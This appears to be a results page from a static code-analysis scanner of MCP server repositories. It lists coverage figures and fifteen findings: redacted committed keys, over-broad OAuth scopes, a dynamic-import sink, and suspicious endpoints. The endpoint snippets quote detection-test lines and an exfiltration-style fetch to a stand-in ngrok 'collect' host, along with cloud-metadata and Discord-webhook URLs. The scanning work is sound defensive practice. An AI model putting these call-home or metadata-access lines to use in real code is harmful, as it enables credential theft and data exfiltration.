Code analysis

static source read inferred

Static code-analysis findings — hidden prompt content in shipped skill files, committed secrets, dynamic-exec sinks, and suspicious call-home endpoints — across the analyzed catalogue. Heuristic, pure, no code executed; every row deep-links to its source. Click a kind to filter.

analysis coverage 86% of 59,694 analyzable servers
51197 analyzed
7502 re-analysis due
995 not analyzable
0 not yet analyzed
4849 source gone
not analyzable
795 too large 200 no source

Running analyzer v33. The scanner changelog explains what each version detects and when it changed.

code findings 15 shown
  1. MEDIUM suspicious endpoint ardakocadoruu/mcpguard 169.254.169.254 (cloud metadata) "http://169.254.169.254/latest/meta-data/", # AWS IMDS
  2. HIGH committed secret ardakocadoruu/mcpguard Anthropic key sk-ant…(33 chars, redacted)
  3. HIGH committed secret ardakocadoruu/mcpguard OpenAI key sk-pro…(49 chars, redacted)
  4. MEDIUM suspicious endpoint ardakocadoruu/mcpguard abc123.ngrok.io code = 'const res = await fetch("https://abc123.ngrok.io/collect");\n'
  5. HIGH committed secret ardakocadoruu/mcpguard private key PEM private key block (redacted)
  6. HIGH credential in log yinsang0910-star/collab-cli credential in log console.log(` 认证 Token: ${authToken}`);
  7. MEDIUM over-broad oauth scope anaypaul/google-doc-claude https://www.googleapis.com/auth/drive "https://www.googleapis.com/auth/drive",
  8. MEDIUM over-broad oauth scope anaypaul/google-doc-claude https://www.googleapis.com/auth/documents "https://www.googleapis.com/auth/documents",
  9. HIGH dynamic exec YashvantHange/SuperMemory __import__() __import__(
  10. MEDIUM suspicious endpoint ernestprovo23/mcp-warden 93.184.216.34 assert RULE_IP not in _ids(_run("see https://93.184.216.34/x"))
  11. MEDIUM suspicious endpoint ernestprovo23/mcp-warden 169.254.169.254 (cloud metadata) "https://169.254.169.254/x",
  12. MEDIUM suspicious endpoint ernestprovo23/mcp-warden discord.com assert "WRD-RES-EXFIL-DOMAIN" in _ids(_run("https://discord.com/api/webhooks/123/abc"))
  13. MEDIUM suspicious endpoint ernestprovo23/mcp-warden abc123.ngrok.io assert "WRD-RES-EXFIL-DOMAIN" in _ids(_run("see https://abc123.ngrok.io/x"))
  14. MEDIUM suspicious endpoint ernestprovo23/mcp-warden ngrok.io assert "WRD-RES-EXFIL-DOMAIN" in _ids(_run("see https://ngrok.io/x"))
  15. MEDIUM suspicious endpoint ernestprovo23/mcp-warden 169.254.169.254 (cloud metadata) hosts = extract_dns_candidates("https://169.254.169.254/latest/meta-data")